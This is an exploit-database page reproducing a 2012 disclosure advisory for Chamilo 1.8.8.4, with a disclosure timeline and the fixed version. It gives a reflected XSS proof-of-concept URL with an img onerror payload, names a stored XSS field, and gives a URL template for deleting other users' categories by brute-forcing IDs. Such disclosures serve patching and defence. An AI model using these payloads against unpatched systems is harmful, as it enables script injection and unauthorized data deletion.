Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2012-4029 | CWE-79 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2012-08-29 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N | 0.02192 | 0.50148 |
Chamilo 1.8.8.4 Multiple Vulnerabilities ======================== CVE: CVE-2012-4029 Issue: Reflected XSS PHP_SELF in third-party app, Stored XSS * PHP_SELF XSS http://chamilo-1.8.8.4/main/inc/lib/phpdocx/pdf/www/examples.php/'"><img src=404 onerror=alert(1) > * Stored XSS unfiltered input category_name http://chamilo/chamilo-1.8.8.4/main/dropbox/index.php?cidReq=LEETLANG&view=&action=addsentcategory CVE: CVE-2012-4030 Issue: Unauthorized file delete * Unauthorized file delete You have to be subscribed to the course and you can delete other users categories by bruteforcing the category ID. http://chamilo/chamilo-1.8.8.4/main/dropbox/index.php?cidReq=COURSEID&view_received_category=&view_sent_category=&view=&action=deletesentcategory&id=CATEGORYID Vendor: www.chamilo.org Vendor informed: Jul 16/2012 Vendor acknowledgement: Jul 16/2012 Fix Released Version 1.8.8.6 - Jul 20/2012
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.